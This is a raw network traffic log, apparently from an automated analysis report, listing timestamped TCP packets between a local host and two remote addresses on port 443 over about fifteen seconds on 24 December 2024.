                                                                                        Dec 24, 2024 22:11:50.153084993 CET44349853142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:50.153146982 CET49853443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:50.153429985 CET49853443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:50.195358992 CET44349853142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:50.195374012 CET44349852142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:51.050705910 CET44349853142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:51.050771952 CET49853443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:51.050836086 CET44349853142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:51.050894022 CET49853443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:51.050937891 CET49853443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:51.050987005 CET44349853142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:51.051033020 CET49853443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:51.051584959 CET49856443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:51.051640987 CET44349856142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:51.051672935 CET49857443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:51.051691055 CET44349857142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:51.051714897 CET49856443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:51.051767111 CET49857443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:51.052058935 CET49856443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:51.052088022 CET44349856142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:51.052139044 CET49857443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:51.052164078 CET44349857142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:51.061897993 CET44349852142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:51.061959028 CET49852443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:51.062026978 CET49852443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:51.062064886 CET44349852142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:51.062113047 CET49852443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:51.062609911 CET49858443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:51.062640905 CET44349858142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:51.062711000 CET49858443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:51.062869072 CET49858443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:51.062896013 CET44349858142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:51.072711945 CET44349851142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:51.072757006 CET44349851142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:51.072777033 CET49851443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:51.072845936 CET44349851142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:51.072904110 CET49851443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:51.072904110 CET49851443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:51.073353052 CET49851443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:51.073401928 CET44349851142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:51.073457956 CET49851443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:51.073708057 CET49859443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:51.073750019 CET44349859142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:51.073817968 CET49859443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:51.074059010 CET49859443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:51.074090004 CET44349859142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:52.429613113 CET49856443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:52.429728985 CET49857443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:52.429728985 CET49858443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:52.429761887 CET49859443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:52.430243015 CET49861443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:52.430330038 CET44349861142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:52.430757046 CET49861443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:52.431107998 CET49862443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:52.431154013 CET44349862142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:52.431996107 CET49861443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:52.432033062 CET49862443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:52.432034969 CET44349861142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:52.432496071 CET49862443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:52.432507992 CET44349862142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:54.129307985 CET44349861142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:54.129405022 CET49861443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:54.130057096 CET44349861142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:54.130163908 CET49861443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:54.133521080 CET49861443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:54.133549929 CET44349861142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:54.133800983 CET44349861142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:54.133857965 CET49861443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:54.134238958 CET49861443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:54.175359964 CET44349861142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:54.318392038 CET44349862142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:54.318517923 CET49862443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:54.319108009 CET44349862142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:54.319169998 CET49862443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:54.320686102 CET49862443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:54.320693970 CET44349862142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:54.320924044 CET44349862142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:54.320991993 CET49862443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:54.321620941 CET49862443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:54.363337040 CET44349862142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:55.170372963 CET44349861142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:55.170445919 CET44349861142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:55.170578003 CET49861443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:55.170578003 CET49861443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:55.170838118 CET49861443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:55.170855999 CET44349861142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:55.171439886 CET49866443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:55.171525955 CET44349866142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:55.171653032 CET49866443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:55.172185898 CET49866443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:55.172220945 CET44349866142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:55.172662973 CET49867443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:55.172683954 CET44349867142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:55.172754049 CET49867443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:55.172967911 CET49867443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:55.172987938 CET44349867142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:55.244834900 CET44349862142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:55.245019913 CET49862443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:55.245029926 CET44349862142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:55.245079994 CET49862443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:55.245120049 CET49862443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:55.245146990 CET44349862142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:55.245192051 CET49862443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:55.245539904 CET49868443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:55.245575905 CET44349868142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:55.245635986 CET49869443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:55.245635986 CET49868443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:55.245645046 CET44349869142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:55.245692015 CET49869443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:55.245799065 CET49868443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:55.245809078 CET44349868142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:55.245933056 CET49869443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:55.245940924 CET44349869142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:56.454056025 CET49866443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:56.454082966 CET49868443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:56.454114914 CET49867443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:56.454138041 CET49869443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:56.454870939 CET49872443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:56.454924107 CET44349872142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:56.454982042 CET49872443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:56.455267906 CET49872443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:56.455281973 CET44349872142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:56.457204103 CET49873443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:56.457268000 CET44349873142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:56.457469940 CET49873443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:56.458117962 CET49873443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:56.458168030 CET44349873142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:58.149311066 CET44349873142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:58.149457932 CET49873443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:58.150099993 CET44349873142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:58.150130987 CET44349872142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:58.150182962 CET49873443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:58.150219917 CET49872443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:58.150903940 CET44349872142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:58.150954962 CET49872443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:58.160494089 CET49873443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:58.160542011 CET44349873142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:58.160559893 CET49872443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:58.160574913 CET44349872142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:58.160820007 CET44349872142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:58.160828114 CET44349873142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:58.160887003 CET49872443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:58.160901070 CET49873443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:58.161194086 CET49872443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:58.161252975 CET49873443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:58.203351974 CET44349873142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:58.207338095 CET44349872142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:59.059426069 CET44349873142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:59.059510946 CET49873443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:59.059606075 CET49873443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:59.059669971 CET44349873142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:59.059726954 CET49873443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:59.060200930 CET49876443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:59.060200930 CET49877443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:59.060302019 CET44349876142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:59.060336113 CET44349877142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:59.060399055 CET49876443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:59.060477018 CET49877443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:59.060600996 CET49876443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:59.060638905 CET44349876142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:59.060662031 CET49877443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:59.060681105 CET44349877142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:59.183237076 CET44349872142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:59.183293104 CET49872443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:59.187877893 CET44349872142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:59.187922955 CET44349872142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:59.187943935 CET49872443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:59.187973022 CET49872443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:59.189841032 CET49872443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:59.189856052 CET44349872142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:59.189873934 CET49872443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:59.189904928 CET49872443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:59.190431118 CET49878443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:59.190471888 CET44349878142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:59.190527916 CET49878443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:59.190659046 CET49879443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:59.190665960 CET44349879142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:59.190712929 CET49879443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:59.190895081 CET49879443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:59.190907001 CET44349879142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:59.191416025 CET49878443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:59.191423893 CET44349878142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:12:00.758368969 CET44349877142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:12:00.758502960 CET49877443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:12:00.761513948 CET49877443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:12:00.761532068 CET44349877142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:12:00.761537075 CET44349876142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:00.761625051 CET49876443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:00.761786938 CET44349877142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:12:00.761899948 CET49876443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:00.761912107 CET44349876142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:00.761945009 CET49877443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:12:00.762227058 CET49877443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:12:00.763710022 CET49876443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:00.763720036 CET44349876142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:00.803344011 CET44349877142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:12:00.884207010 CET44349879142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:00.884268999 CET49879443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:00.884599924 CET49879443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:00.884607077 CET44349879142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:00.884862900 CET44349878142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:12:00.884921074 CET49878443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:12:00.886419058 CET49879443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:00.886424065 CET44349879142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:00.886743069 CET49878443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:12:00.886746883 CET44349878142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:12:00.886964083 CET44349878142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:12:00.887012959 CET49878443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:12:00.887339115 CET49878443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:12:00.935337067 CET44349878142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:12:01.663645983 CET44349876142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:01.663762093 CET49876443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:01.663794994 CET44349876142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:01.663861036 CET49876443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:01.664132118 CET49876443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:01.664182901 CET44349876142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:01.664397955 CET44349876142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:01.664463997 CET49876443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:01.664463997 CET49876443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:01.664696932 CET49883443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:01.664778948 CET44349883142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:01.664844990 CET49883443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:01.665051937 CET49883443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:01.665086985 CET44349883142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:01.690795898 CET44349877142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:12:01.690845966 CET44349877142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:12:01.690927982 CET49877443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:12:01.690946102 CET44349877142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:12:01.690972090 CET44349877142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:12:01.690998077 CET49877443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:12:01.691020966 CET49877443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:12:01.691553116 CET49877443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:12:01.691580057 CET44349877142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:12:01.691881895 CET49884443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:12:01.691912889 CET44349884142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:12:01.692240000 CET49884443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:12:01.692442894 CET49884443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:12:01.692450047 CET44349884142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:12:01.801213980 CET44349879142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:01.801320076 CET49879443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:01.801517963 CET49879443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:01.801549911 CET44349879142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:01.801676989 CET44349879142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:01.801768064 CET49879443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:01.801786900 CET49879443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:01.802144051 CET49885443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:01.802162886 CET44349885142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:01.802212954 CET49885443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:01.802361965 CET49885443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:01.802371979 CET44349885142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:01.953541040 CET44349878142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:12:01.953584909 CET44349878142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:12:01.953681946 CET44349878142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:12:01.953686953 CET49878443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:12:01.953738928 CET49878443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:12:01.956142902 CET49878443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:12:01.956161022 CET44349878142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:12:01.956686020 CET49887443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:12:01.956784964 CET44349887142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:12:01.956871986 CET49887443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:12:01.957072973 CET49887443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:12:01.957108021 CET44349887142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:12:02.164032936 CET49883443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:02.164050102 CET49884443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:12:02.164072990 CET49885443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:02.164096117 CET49887443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:12:02.164472103 CET49888443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:02.164508104 CET44349888142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:02.164570093 CET49888443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:02.165275097 CET49888443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:02.165282965 CET44349888142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:02.165844917 CET49889443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:02.165925026 CET44349889142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:02.166055918 CET49889443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:02.166264057 CET49889443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:02.166301012 CET44349889142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:03.861562967 CET44349889142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:03.861649990 CET49889443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:03.862304926 CET44349889142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:03.862370968 CET49889443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:03.864116907 CET44349888142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:03.864193916 CET49888443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:03.864869118 CET44349888142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:03.864927053 CET49888443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:03.865936041 CET49889443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:03.865961075 CET44349889142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:03.866209030 CET44349889142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:03.867849112 CET49888443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:03.867855072 CET44349888142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:03.867882967 CET49889443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:03.868062019 CET44349888142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:03.868249893 CET49889443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:03.868266106 CET49888443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:03.868510962 CET49888443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:03.911355972 CET44349889142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:03.915333986 CET44349888142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:04.793251038 CET44349888142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:04.793323994 CET49888443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:04.793339014 CET44349888142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:04.793379068 CET49888443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:04.797077894 CET44349888142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:04.797120094 CET44349888142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:04.797130108 CET49888443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:04.797156096 CET49888443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:04.798382998 CET49888443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:04.798394918 CET44349888142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:04.801208019 CET44349889142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:04.801280975 CET49889443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:04.801325083 CET44349889142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:04.801384926 CET49889443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:04.801434040 CET49897443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:12:04.801474094 CET44349897142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:12:04.801531076 CET49897443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:12:04.801757097 CET49898443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:04.801764011 CET44349898142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:04.801808119 CET49898443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:04.805866957 CET44349889142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:04.805919886 CET44349889142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:04.805943966 CET49889443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:04.805969954 CET49889443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:04.808538914 CET49898443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:04.808547974 CET44349898142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:04.817540884 CET49889443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:04.817572117 CET44349889142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:04.821471930 CET49899443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:12:04.821480036 CET44349899142.250.181.1192.168.2.4
